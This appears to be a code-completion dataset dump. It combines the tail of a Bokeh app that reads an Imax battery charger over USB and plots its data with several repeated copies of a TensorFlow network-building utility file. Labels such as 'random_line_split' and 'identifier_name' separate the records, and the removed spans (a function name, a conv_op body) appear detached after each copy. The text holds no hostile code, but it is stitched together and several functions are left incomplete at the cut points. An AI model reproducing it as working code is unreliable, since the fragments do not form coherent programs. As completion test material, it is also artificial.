text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Waiting for Imax button press for one minute.')
while settings['run_status'] > 1:
settings['run_status'] = check_device_status()
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax button not pressed in 1 min...aborting start.')
return False
time.sleep(1)
print('out of loop run_status is: ', settings['run_status'])
return True
def add_lines(plot, source, cells_num = 0):
#called from button_startstop_handler if bat_type LiPO, note cells must be > 1
color_list = ['orange', 'yellow', 'green', 'blue', 'violet', 'darkmagenta']
if cells_num > 1:
for i in range(cells_num):
p1.line(x = 'timer', y = 'cell'+ str(i+1), source = source, color = color_list[i], line_width = 2)
button_startstop = Button(label = "Start", button_type = 'success')
def button_startstop_handler():
global button_startstop
#read btn label and isas driver for condition
#label = "Start": and device_started = False is initial start up condition
if button_startstop.label == "Start":
button_startstop.label = "Connecting"
settings['device_started'] = start_device()
#returns True if device found,connected and started
if settings['device_started']:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax found & running.')
button_startstop.label = "Stop"
settings['start_cycle'] = curdoc().add_periodic_callback(update, 10000)
print('device found')
else:
if not settings['device_started']:
button_startstop.label = "Start"
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax start failed. Check everything')
else: #deal with stop conditions; user pressed app stop button, or run_status > 1 (imax buttons pressed.)
if button_startstop.label == "Stop":
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Run stopped.')
curdoc().remove_periodic_callback(settings['start_cycle'])
get_final_data()
button_startstop.label = "Start"
if "Li" in settings['bat_type']:
add_lines(p1, source, cells_num = int(settings['cells']))
button_startstop.on_click(button_startstop_handler)
def read_imax():
global read_data
global device_dict
# see above call to start_imax() for globals set from imax.py
#global data_out_packet
global out_data
#global run_status
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
#send the host->imax packet to trigger imax to fill buffer and do imax->host transfer
#make sure device is still connected
w_out = device.write(EndPt_out, settings['data_out_packet'])
try:
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize) #using more general form of Endpoint_IN attributes
except Exception as e:
print('Something went wrong: no data incoming; error is: ', e)
sys.exit()
#Parse the hex data
out_data['mah'] = [int(str(data[5]*256 + data[6]))] #capacity, mah
out_data['timer'] = [int(str(data[7]*256 + data[8]))] #seconds
out_data['volts'] = [int(str(data[9]*256 + data[10]))] #volts
out_data['current'] = [int(str(data[11]*256 + data[12]))] #amps
out_data['ext_T'] = [int(str(data[13]))]
out_data['internal_T'] = [int(str(data[14]))] #deg. C?
out_data['cell1'] = [int(str(data[17]*256 + data[18]))] #cell 1 etc.
out_data['cell2'] = [int(str(data[19]*256 + data[20]))]
out_data['cell3'] = [int(str(data[21]*256 + data[22]))]
out_data['cell4'] = [int(str(data[23]*256 + data[24]))]
out_data['cell5'] = [int(str(data[25]*256 + data[26]))]
out_data['cell6'] = [int(str(data[27]*256 + data[28]))]
read_data['mah'].append(int(str(data[5]*256 + data[6]))) #capacity, mah
read_data['timer'].append(int(str(data[7]*256 + data[8]))) #seconds
read_data['volts'].append(int(str(data[9]*256 + data[10]))) #volts
read_data['current'].append(int(str(data[11]*256 + data[12]))) #amps
read_data['ext_T'].append(int(str(data[13])))
read_data['internal_T'].append(int(str(data[14]))) #deg. C?
read_data['cell1'].append(int(str(data[17]*256 + data[18])))
read_data['cell2'].append(int(str(data[19]*256 + data[20])))
read_data['cell3'].append(int(str(data[21]*256 + data[22])))
read_data['cell4'].append(int(str(data[23]*256 + data[24])))
read_data['cell5'].append(int(str(data[25]*256 + data[26])))
read_data['cell6'].append(int(str(data[27]*256 + data[28])))
#print the data (same sequence Milek7 used with hidapi; much appreciated effort.
print(
str(data[4]) + ", " + #state
str(data[5] * 256 + data[6]) + ", " + #energy
str(data[7] * 256 + data[8]) + ", " + #timer
str((data[9] * 256 + data[10]) / 1000.0) + ", " + #voltage
str((data[11] * 256 + data[12]) / 1000.0) + ", " + #current
str(data[13]) + ", " + #ext temp
str(data[14]) + ", " + #int temp
str((data[17] * 256 + data[18]) / 1000.0) + ", " + #cell 1
str((data[19] * 256 + data[20]) / 1000.0) + ", " + #cels 2
str((data[21] * 256 + data[22]) / 1000.0) + ", " + #cell 3
str((data[23] * 256 + data[24]) / 1000.0) + ", " + #cell 4
str((data[25] * 256 + data[26]) / 1000.0) + ", " + #cell 5
str((data[27] * 256 + data[28]) / 1000.0) #cell 6
)
#Has the charger been stopped by pressing the charger Stop button?
settings['run_status'] = int(str(data[4]))
return settings['run_status'], out_data
#initialize read_data dictionary for plots
out_data = {'mah':[0], 'timer':[0], 'volts':[0], 'current':[0],
'ext_T':[0], 'internal_T':[0], 'cell1':[0], 'cell2':[0],
'cell3':[0],'cell4':[0], 'cell5':[0], 'cell6':[0]}
#time_interval = 5 #seconds
source = ColumnDataSource(data = out_data)
#Generate two plots, for capacity and voltage
p = figure(plot_width=400, plot_height=400)
p.title.text = "Capactiy Input vs. Charge Time"
p.title.text_color = "black"
p.title.text_font = "arial"
p.title.text_font_style = "bold"
p.yaxis.minor_tick_line_color = "black"
p.xaxis.axis_label = "Time, s"
p.yaxis.axis_label = "Capacity Added(mah)"
r_cap = p.line(x = 'timer', y = 'mah', source = source, color="red", line_width=2)
#Set the voltabe plot; complicated a bit by battery type
p1 = figure(plot_width=400, plot_height=400)
p1.title.text = "Voltage vs. Charge Time"
p1.title.text_color = "black"
p1.title.text_font = "arial"
p1.title.text_font_style = "bold"
p1.yaxis.minor_tick_line_color = "black"
p1.xaxis.axis_label = "Time, s"
p1.yaxis.axis_label = "Voltage. mV"
rx = p1.line(x = 'timer', y = 'volts', source = source, color = "firebrick", line_width=2)
"""
#test block for adding lines
if "Li" in bat_type:
r1 = p1.line(x ='timer', y = 'cell1', source = source, color="orange", line_width=2)
r2 = p1.line(x ='timer', y = 'cell2', source = source, color="yellow", line_width=2)
r3 = p1.line(x ='timer', y = 'cell3', source = source, color="green", line_width=2)
r4 = p1.line(x ='timer', y = 'cell4', source = source, color="blue", line_width=2)
r5 = p1.line(x ='timer', y = 'cell5', source = source, color="violet", line_width=2)
r6 = p1.line(x ='timer', y = 'cell6', source = source, color="darkmagenta", line_width=2)
"""
def update():
global out_data
global source
global device_dict
device = device_dict['device']
if device:
#note "new_data" is bokeh specific to only add to source
settings['run_status'], new_data = read_imax()
#print('read_imax returned run status: ', settings['run_status'])
if settings['run_status'] < 2 and button_startstop.label == "Stop":
source.stream(new_data) # 20)
else:
msg = '; User stopped run from imax stop button.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
else:
msg = '; Device no longer connected.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
"""
class Cycler(update()):
msg = "Message from Cycler"
start_cycle = staticmethod(curdoc().add_periodic_callback(update, 10000))
stop_cycle = staticmethod(curdoc().remove_periodic_callback(start_cycle))
# create the widgets
"""
#start_cycle = curdoc().add_periodic_callback(update, 10000) #time in milliseconds
#w1 = row(select_battype, select_chrg_type) #, width = 300) #sizing_mode = 'fixed')
w1 = widgetbox(select_battype, select_chrg_type, select_cells) #, width = 300) #sizing_mode = 'fixed')
w2 = widgetbox(maxmah_slider) #, sizing_mode='fixed')
w3 = widgetbox(text_input) #, sizing_mode = 'fixed')
w4 = widgetbox(button_startstop, button_save )#, sizing_mode ='fixed')
w5 = widgetbox(DC_radio_group, select_cycles)
w6 = widgetbox(data_table)
"""
Layit = layout([row(column(
[notice1],
[w1],
[w2],
[w3],
[w4],
[w5],
[data_table]),
column(p, p1))], sizing_mode='fixed')
"""
#Layit = gridplot([[column([p, p1]), widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children)]])
curdoc().add_root(notice1)
Layit = gridplot([[widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children,), column([p, p1])]])
curdoc().add_root(Layit)
curdoc().add_root(data_table)
#curdoc().add_root(p)
#curdoc().add_root(p1)
#interval is not constant,
#based on derivative of capacity
# Add a periodic callback to be run every 500 milliseconds
#curdoc().add_periodic_callback(update, 500)
#for running textarea update following is one way to do it with js
"""
textare udating w/ jquery and textarea
var txt = document.getElementById('log');
setInterval(function(){txt.value += '\ntest';},2000);
<textarea id='log' rows=50 cols=60 autofocus></textarea>
""" | 'settings_dict':settings_dict,
'device_dict':device_dict
}
| random_line_split |
network.py | ## Collection of utils for building networks
import numpy as np
import tensorflow as tf
from tensorflow.contrib import layers
from atflow import constraints
def conv2d_output_shape(input_shape, filter_shape, stride, padding):
"""
Computes the shape of the output tensor from conv2d operation with the given configuration
:param input_shape: shape of the input tensor, must be a list, numpy array or TensorShape
:param filter_shape: shape of the convolution filter.
:param stride: stride for the convolution
:param padding: padding mode, either 'VALID' or 'SAME'
:return: shape of the output tensor as a plain list of integers
"""
filter_shape = tf.TensorShape(filter_shape).as_list()
filter_out = filter_shape[-1]
filter_patch_shape = np.array(filter_shape[0:2])
input_shape_list = tf.TensorShape(input_shape).as_list()
batch = input_shape_list[:-3]
input_shape = np.array(input_shape_list[-3:])
stride = np.array(stride)
if padding == 'VALID':
shift = -filter_patch_shape + 1
elif padding == 'SAME':
shift = 0
else:
raise ValueError('padding must be either "VALID" or "SAME", but "%s" was given' % padding)
output_shape = np.ceil((input_shape[:2] + shift) / stride[1:3])
return batch + output_shape.astype(np.int).tolist() + [filter_out]
def conv2d_config(input_shape, output_shape, filter_shape):
"""
Based on the desired input, output and filter shape, figure out the correct 2D convolution configuration to use
including the type (normal or full convolution), stride size, padding type/size
:param input_shape:
:param output_shape:
:param filter_shape:
:return:
"""
input_shape = tf.TensorShape(input_shape).as_list()
if len(input_shape) == 4:
batch_size = input_shape[0]
else:
batch_size = None
input_shape = np.array(input_shape[-3:])
output_shape = np.array(tf.TensorShape(output_shape).as_list()[-3:])
# Determine what kind of convolution to use
if np.all(input_shape[-3:-1] >= output_shape[-3:-1]):
conv_type = "NORMAL"
elif np.all(input_shape[-3:-1] <= output_shape[-3:-1]):
conv_type = 'FULL'
# swap input and output shape
input_shape, output_shape = output_shape, input_shape
else:
raise ValueError('Input shape dimensions must be both bigger than or both smaller than output shape dimensions')
filter_shape = np.array(tf.TensorShape(filter_shape).as_list()[:2] + [input_shape[-1], output_shape[-1]])
stride = np.ceil((input_shape[:2] - filter_shape[:2] + 1) / output_shape[:2]).astype(np.int)
padding = output_shape[:2] * stride - input_shape[:2] + filter_shape[:2] - 1
# Determine what type of padding can be used
if np.all(np.ceil(input_shape[:2] / stride) == output_shape[:2]):
padding_type = 'SAME'
else:
padding_type = 'VALID'
# get padded input shape
input_shape[:2] = input_shape[:2] + padding.astype(np.int)
padded_shape = [batch_size] + input_shape.tolist()
left_padding = np.ceil(padding / 2).astype(np.int)
right_padding = np.floor(padding / 2).astype(np.int)
padding = [[0, 0], [left_padding[0], right_padding[0]], [left_padding[1], right_padding[1]], [0, 0]]
stride = [1, stride[0], stride[1], 1]
return filter_shape.tolist(), stride, padding, padded_shape, conv_type, padding_type
def get_convolution_op(input_shape, output_shape, kernel_shape):
"""
Given the desired shapes of the input, output and filter tensors, returns the shape of the appropriate
convolution filter and a correctly configured op function. The returned op function should be called with the
input tensor and weight tensor, and returns a result of 2D convolution that matches the desired output_shape
:param input_shape: desired input shape into the convolution operation
:param output_shape: desired output shape from the convolution operation
:param kernel_shape: desired convolution kernel shape. Only the first two diemensions (height and width) will be used.
:return: (filter_shape, conv_op) The shape of the appropriate convolution filter/weight to be used (filter_shape) and
a function that can be invoked with inputs tensor and correctly sized filter tensor to define the convolution operation.
"""
filter_shape, strides, padding, padded_shape, conv_type, padding_type = conv2d_config(input_shape, output_shape, kernel_shape)
if conv_type == 'NORMAL':
|
else:
def conv_op(inputs, weight, name='generic_convolution'):
if padding_type=='SAME':
padded_output = [padded_shape[0]] + output_shape[-3:]
else:
padded_output = padded_shape
with tf.name_scope(name):
if padded_output[0] is None:
batch_size = tf.shape(inputs)[0]
padded_output = [batch_size] + padded_output[1:]
output = tf.nn.conv2d_transpose(inputs, weight, padded_output, strides, padding_type, name='transpose_convolution')
if padding_type=='VALID' and np.sum(padding) > 0:
output = tf.slice(output, [0, padding[1][0], padding[2][0], 0],
[-1] + output_shape[-3:], name='cropping')
return output
return filter_shape, conv_op
def normalize_weights(w, dims=(0,), bias=1e-5):
"""
L2 normalize weights of the given tensor along specified dimension(s).
Args:
w: Tensor to be normalized
dims: dimension(s) along which to normalize the Tensor. Defaults to (0,)
bias: Bias value added to the computed norm to prevent dividing by 0. Defaults to 1e-5
Returns: Tensor of same type and shape as `w` whose norm is set to approximately 1 along the specificed dimensions
"""
with tf.name_scope('normalization'):
return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))
def weight_variable(shape, name='weight', mean=0.0, stddev=None, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a weight.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'weight'
mean: Optional. Mean of the `random_normal_initializer`. Defaults to 0.0
stddev: Optional. Standard deviation of the `random_normal_initializer`. Defaults to 1e-3
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Weight variable with specified name and shape with random normal initialization.
"""
if stddev is None:
raise ValueError('stddev not specified!')
if initializer is None:
initializer = tf.random_normal_initializer(mean=mean, stddev=stddev)
weights = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(weights)
return weights
def bias_variable(shape, name='bias', value=0.0, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a bias.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'bias'
value: Optional. Constant value to which the variable is initialized. Defaults to 0.0
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Bias variable with specified name and shape initialized to a constant.
"""
if initializer is None:
initializer = tf.constant_initializer(value=value)
biases = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(biases)
return biases
def factorized_readout(inputs, n_outputs=100, constrain=True):
width, height, n_features = inputs.get_shape()[1:].as_list()
n_pixels = width * height
with tf.variable_scope('readout'):
# spatial readout
w_spatial = weight_variable([n_pixels, 1, n_outputs], name='weight_spatial')
if constrain:
constraints.positive_constrain(w_spatial)
w_spatial_norm = normalize_weights(w_spatial, dims=(0,))
# feature readout
w_feature = weight_variable([1, n_features, n_outputs], name='weight_feature')
if constrain:
constraints.positive_constrain(w_feature)
w_feature_norm = normalize_weights(w_feature, dims=(1,))
# scaling
w_scale = bias_variable([n_outputs], name='weight_scale', value=1.0)
if constrain:
constraints.positive_constrain(w_scale)
# total readout weight
w_out = tf.reshape(w_spatial_norm * w_feature_norm * w_scale, [n_pixels * n_features, n_outputs],
'weight_readout')
output = tf.matmul(tf.reshape(inputs, [-1, n_pixels * n_features]), w_out)
return output, w_spatial_norm, w_feature_norm, w_scale, w_out
def batch_norm(inputs, *args, tag=None, add_summary=True, step=0, **kwargs):
if step > 0 and 'updates_collections' not in kwargs:
kwargs['updates_collections'] = 'dump'
output = layers.batch_norm(inputs, *args, **kwargs)
if add_summary:
if tag is None:
tag = inputs.op.name.split('/')[-1]
tag = 'batch_norm/' + tag
tf.histogram_summary(tag, inputs)
tf.histogram_summary(tag + '_bn', output)
return output | def conv_op(inputs, weight, name='generic_convolution'):
with tf.name_scope(name):
if padding_type=='VALID' and np.sum(padding) > 0:
inputs = tf.pad(inputs, padding, name='padding')
return tf.nn.conv2d(inputs, weight, strides, padding_type, name='convolution') | conditional_block |
network.py | ## Collection of utils for building networks
import numpy as np
import tensorflow as tf
from tensorflow.contrib import layers
from atflow import constraints
def conv2d_output_shape(input_shape, filter_shape, stride, padding):
"""
Computes the shape of the output tensor from conv2d operation with the given configuration
:param input_shape: shape of the input tensor, must be a list, numpy array or TensorShape
:param filter_shape: shape of the convolution filter.
:param stride: stride for the convolution
:param padding: padding mode, either 'VALID' or 'SAME'
:return: shape of the output tensor as a plain list of integers
"""
filter_shape = tf.TensorShape(filter_shape).as_list()
filter_out = filter_shape[-1]
filter_patch_shape = np.array(filter_shape[0:2])
input_shape_list = tf.TensorShape(input_shape).as_list()
batch = input_shape_list[:-3]
input_shape = np.array(input_shape_list[-3:])
stride = np.array(stride)
if padding == 'VALID':
shift = -filter_patch_shape + 1
elif padding == 'SAME':
shift = 0
else:
raise ValueError('padding must be either "VALID" or "SAME", but "%s" was given' % padding)
output_shape = np.ceil((input_shape[:2] + shift) / stride[1:3])
return batch + output_shape.astype(np.int).tolist() + [filter_out]
def | (input_shape, output_shape, filter_shape):
"""
Based on the desired input, output and filter shape, figure out the correct 2D convolution configuration to use
including the type (normal or full convolution), stride size, padding type/size
:param input_shape:
:param output_shape:
:param filter_shape:
:return:
"""
input_shape = tf.TensorShape(input_shape).as_list()
if len(input_shape) == 4:
batch_size = input_shape[0]
else:
batch_size = None
input_shape = np.array(input_shape[-3:])
output_shape = np.array(tf.TensorShape(output_shape).as_list()[-3:])
# Determine what kind of convolution to use
if np.all(input_shape[-3:-1] >= output_shape[-3:-1]):
conv_type = "NORMAL"
elif np.all(input_shape[-3:-1] <= output_shape[-3:-1]):
conv_type = 'FULL'
# swap input and output shape
input_shape, output_shape = output_shape, input_shape
else:
raise ValueError('Input shape dimensions must be both bigger than or both smaller than output shape dimensions')
filter_shape = np.array(tf.TensorShape(filter_shape).as_list()[:2] + [input_shape[-1], output_shape[-1]])
stride = np.ceil((input_shape[:2] - filter_shape[:2] + 1) / output_shape[:2]).astype(np.int)
padding = output_shape[:2] * stride - input_shape[:2] + filter_shape[:2] - 1
# Determine what type of padding can be used
if np.all(np.ceil(input_shape[:2] / stride) == output_shape[:2]):
padding_type = 'SAME'
else:
padding_type = 'VALID'
# get padded input shape
input_shape[:2] = input_shape[:2] + padding.astype(np.int)
padded_shape = [batch_size] + input_shape.tolist()
left_padding = np.ceil(padding / 2).astype(np.int)
right_padding = np.floor(padding / 2).astype(np.int)
padding = [[0, 0], [left_padding[0], right_padding[0]], [left_padding[1], right_padding[1]], [0, 0]]
stride = [1, stride[0], stride[1], 1]
return filter_shape.tolist(), stride, padding, padded_shape, conv_type, padding_type
def get_convolution_op(input_shape, output_shape, kernel_shape):
"""
Given the desired shapes of the input, output and filter tensors, returns the shape of the appropriate
convolution filter and a correctly configured op function. The returned op function should be called with the
input tensor and weight tensor, and returns a result of 2D convolution that matches the desired output_shape
:param input_shape: desired input shape into the convolution operation
:param output_shape: desired output shape from the convolution operation
:param kernel_shape: desired convolution kernel shape. Only the first two diemensions (height and width) will be used.
:return: (filter_shape, conv_op) The shape of the appropriate convolution filter/weight to be used (filter_shape) and
a function that can be invoked with inputs tensor and correctly sized filter tensor to define the convolution operation.
"""
filter_shape, strides, padding, padded_shape, conv_type, padding_type = conv2d_config(input_shape, output_shape, kernel_shape)
if conv_type == 'NORMAL':
def conv_op(inputs, weight, name='generic_convolution'):
with tf.name_scope(name):
if padding_type=='VALID' and np.sum(padding) > 0:
inputs = tf.pad(inputs, padding, name='padding')
return tf.nn.conv2d(inputs, weight, strides, padding_type, name='convolution')
else:
def conv_op(inputs, weight, name='generic_convolution'):
if padding_type=='SAME':
padded_output = [padded_shape[0]] + output_shape[-3:]
else:
padded_output = padded_shape
with tf.name_scope(name):
if padded_output[0] is None:
batch_size = tf.shape(inputs)[0]
padded_output = [batch_size] + padded_output[1:]
output = tf.nn.conv2d_transpose(inputs, weight, padded_output, strides, padding_type, name='transpose_convolution')
if padding_type=='VALID' and np.sum(padding) > 0:
output = tf.slice(output, [0, padding[1][0], padding[2][0], 0],
[-1] + output_shape[-3:], name='cropping')
return output
return filter_shape, conv_op
def normalize_weights(w, dims=(0,), bias=1e-5):
"""
L2 normalize weights of the given tensor along specified dimension(s).
Args:
w: Tensor to be normalized
dims: dimension(s) along which to normalize the Tensor. Defaults to (0,)
bias: Bias value added to the computed norm to prevent dividing by 0. Defaults to 1e-5
Returns: Tensor of same type and shape as `w` whose norm is set to approximately 1 along the specificed dimensions
"""
with tf.name_scope('normalization'):
return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))
def weight_variable(shape, name='weight', mean=0.0, stddev=None, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a weight.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'weight'
mean: Optional. Mean of the `random_normal_initializer`. Defaults to 0.0
stddev: Optional. Standard deviation of the `random_normal_initializer`. Defaults to 1e-3
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Weight variable with specified name and shape with random normal initialization.
"""
if stddev is None:
raise ValueError('stddev not specified!')
if initializer is None:
initializer = tf.random_normal_initializer(mean=mean, stddev=stddev)
weights = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(weights)
return weights
def bias_variable(shape, name='bias', value=0.0, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a bias.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'bias'
value: Optional. Constant value to which the variable is initialized. Defaults to 0.0
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Bias variable with specified name and shape initialized to a constant.
"""
if initializer is None:
initializer = tf.constant_initializer(value=value)
biases = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(biases)
return biases
def factorized_readout(inputs, n_outputs=100, constrain=True):
width, height, n_features = inputs.get_shape()[1:].as_list()
n_pixels = width * height
with tf.variable_scope('readout'):
# spatial readout
w_spatial = weight_variable([n_pixels, 1, n_outputs], name='weight_spatial')
if constrain:
constraints.positive_constrain(w_spatial)
w_spatial_norm = normalize_weights(w_spatial, dims=(0,))
# feature readout
w_feature = weight_variable([1, n_features, n_outputs], name='weight_feature')
if constrain:
constraints.positive_constrain(w_feature)
w_feature_norm = normalize_weights(w_feature, dims=(1,))
# scaling
w_scale = bias_variable([n_outputs], name='weight_scale', value=1.0)
if constrain:
constraints.positive_constrain(w_scale)
# total readout weight
w_out = tf.reshape(w_spatial_norm * w_feature_norm * w_scale, [n_pixels * n_features, n_outputs],
'weight_readout')
output = tf.matmul(tf.reshape(inputs, [-1, n_pixels * n_features]), w_out)
return output, w_spatial_norm, w_feature_norm, w_scale, w_out
def batch_norm(inputs, *args, tag=None, add_summary=True, step=0, **kwargs):
if step > 0 and 'updates_collections' not in kwargs:
kwargs['updates_collections'] = 'dump'
output = layers.batch_norm(inputs, *args, **kwargs)
if add_summary:
if tag is None:
tag = inputs.op.name.split('/')[-1]
tag = 'batch_norm/' + tag
tf.histogram_summary(tag, inputs)
tf.histogram_summary(tag + '_bn', output)
return output | conv2d_config | identifier_name |
network.py | ## Collection of utils for building networks
import numpy as np
import tensorflow as tf
from tensorflow.contrib import layers
from atflow import constraints
def conv2d_output_shape(input_shape, filter_shape, stride, padding):
"""
Computes the shape of the output tensor from conv2d operation with the given configuration
:param input_shape: shape of the input tensor, must be a list, numpy array or TensorShape
:param filter_shape: shape of the convolution filter.
:param stride: stride for the convolution
:param padding: padding mode, either 'VALID' or 'SAME'
:return: shape of the output tensor as a plain list of integers
"""
filter_shape = tf.TensorShape(filter_shape).as_list()
filter_out = filter_shape[-1]
filter_patch_shape = np.array(filter_shape[0:2])
input_shape_list = tf.TensorShape(input_shape).as_list()
batch = input_shape_list[:-3]
input_shape = np.array(input_shape_list[-3:])
stride = np.array(stride)
if padding == 'VALID':
shift = -filter_patch_shape + 1
elif padding == 'SAME':
shift = 0
else:
raise ValueError('padding must be either "VALID" or "SAME", but "%s" was given' % padding)
output_shape = np.ceil((input_shape[:2] + shift) / stride[1:3])
return batch + output_shape.astype(np.int).tolist() + [filter_out]
def conv2d_config(input_shape, output_shape, filter_shape):
"""
Based on the desired input, output and filter shape, figure out the correct 2D convolution configuration to use
including the type (normal or full convolution), stride size, padding type/size
:param input_shape:
:param output_shape:
:param filter_shape:
:return:
"""
input_shape = tf.TensorShape(input_shape).as_list()
if len(input_shape) == 4:
batch_size = input_shape[0]
else:
batch_size = None
input_shape = np.array(input_shape[-3:])
output_shape = np.array(tf.TensorShape(output_shape).as_list()[-3:])
# Determine what kind of convolution to use
if np.all(input_shape[-3:-1] >= output_shape[-3:-1]):
conv_type = "NORMAL"
elif np.all(input_shape[-3:-1] <= output_shape[-3:-1]):
conv_type = 'FULL'
# swap input and output shape
input_shape, output_shape = output_shape, input_shape
else:
raise ValueError('Input shape dimensions must be both bigger than or both smaller than output shape dimensions')
filter_shape = np.array(tf.TensorShape(filter_shape).as_list()[:2] + [input_shape[-1], output_shape[-1]])
stride = np.ceil((input_shape[:2] - filter_shape[:2] + 1) / output_shape[:2]).astype(np.int)
padding = output_shape[:2] * stride - input_shape[:2] + filter_shape[:2] - 1
# Determine what type of padding can be used
if np.all(np.ceil(input_shape[:2] / stride) == output_shape[:2]):
padding_type = 'SAME'
else:
padding_type = 'VALID'
# get padded input shape
input_shape[:2] = input_shape[:2] + padding.astype(np.int)
padded_shape = [batch_size] + input_shape.tolist()
left_padding = np.ceil(padding / 2).astype(np.int)
right_padding = np.floor(padding / 2).astype(np.int)
padding = [[0, 0], [left_padding[0], right_padding[0]], [left_padding[1], right_padding[1]], [0, 0]]
stride = [1, stride[0], stride[1], 1]
return filter_shape.tolist(), stride, padding, padded_shape, conv_type, padding_type
def get_convolution_op(input_shape, output_shape, kernel_shape):
"""
Given the desired shapes of the input, output and filter tensors, returns the shape of the appropriate
convolution filter and a correctly configured op function. The returned op function should be called with the
input tensor and weight tensor, and returns a result of 2D convolution that matches the desired output_shape
:param input_shape: desired input shape into the convolution operation
:param output_shape: desired output shape from the convolution operation
:param kernel_shape: desired convolution kernel shape. Only the first two diemensions (height and width) will be used.
:return: (filter_shape, conv_op) The shape of the appropriate convolution filter/weight to be used (filter_shape) and
a function that can be invoked with inputs tensor and correctly sized filter tensor to define the convolution operation.
"""
filter_shape, strides, padding, padded_shape, conv_type, padding_type = conv2d_config(input_shape, output_shape, kernel_shape)
if conv_type == 'NORMAL':
def conv_op(inputs, weight, name='generic_convolution'):
with tf.name_scope(name):
if padding_type=='VALID' and np.sum(padding) > 0:
inputs = tf.pad(inputs, padding, name='padding')
return tf.nn.conv2d(inputs, weight, strides, padding_type, name='convolution')
else:
def conv_op(inputs, weight, name='generic_convolution'):
if padding_type=='SAME':
padded_output = [padded_shape[0]] + output_shape[-3:]
else:
padded_output = padded_shape
with tf.name_scope(name):
if padded_output[0] is None:
batch_size = tf.shape(inputs)[0]
padded_output = [batch_size] + padded_output[1:]
output = tf.nn.conv2d_transpose(inputs, weight, padded_output, strides, padding_type, name='transpose_convolution')
if padding_type=='VALID' and np.sum(padding) > 0:
output = tf.slice(output, [0, padding[1][0], padding[2][0], 0],
[-1] + output_shape[-3:], name='cropping')
return output
return filter_shape, conv_op
def normalize_weights(w, dims=(0,), bias=1e-5):
"""
L2 normalize weights of the given tensor along specified dimension(s).
Args:
w: Tensor to be normalized
dims: dimension(s) along which to normalize the Tensor. Defaults to (0,)
bias: Bias value added to the computed norm to prevent dividing by 0. Defaults to 1e-5
Returns: Tensor of same type and shape as `w` whose norm is set to approximately 1 along the specificed dimensions
"""
with tf.name_scope('normalization'):
return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))
def weight_variable(shape, name='weight', mean=0.0, stddev=None, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a weight.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'weight'
mean: Optional. Mean of the `random_normal_initializer`. Defaults to 0.0
stddev: Optional. Standard deviation of the `random_normal_initializer`. Defaults to 1e-3
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Weight variable with specified name and shape with random normal initialization.
"""
if stddev is None:
raise ValueError('stddev not specified!')
if initializer is None:
initializer = tf.random_normal_initializer(mean=mean, stddev=stddev)
weights = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(weights)
return weights
def bias_variable(shape, name='bias', value=0.0, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a bias.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'bias'
value: Optional. Constant value to which the variable is initialized. Defaults to 0.0
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Bias variable with specified name and shape initialized to a constant.
"""
if initializer is None:
initializer = tf.constant_initializer(value=value)
biases = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(biases)
return biases
def factorized_readout(inputs, n_outputs=100, constrain=True):
width, height, n_features = inputs.get_shape()[1:].as_list()
n_pixels = width * height
with tf.variable_scope('readout'):
# spatial readout
w_spatial = weight_variable([n_pixels, 1, n_outputs], name='weight_spatial')
if constrain:
constraints.positive_constrain(w_spatial)
w_spatial_norm = normalize_weights(w_spatial, dims=(0,))
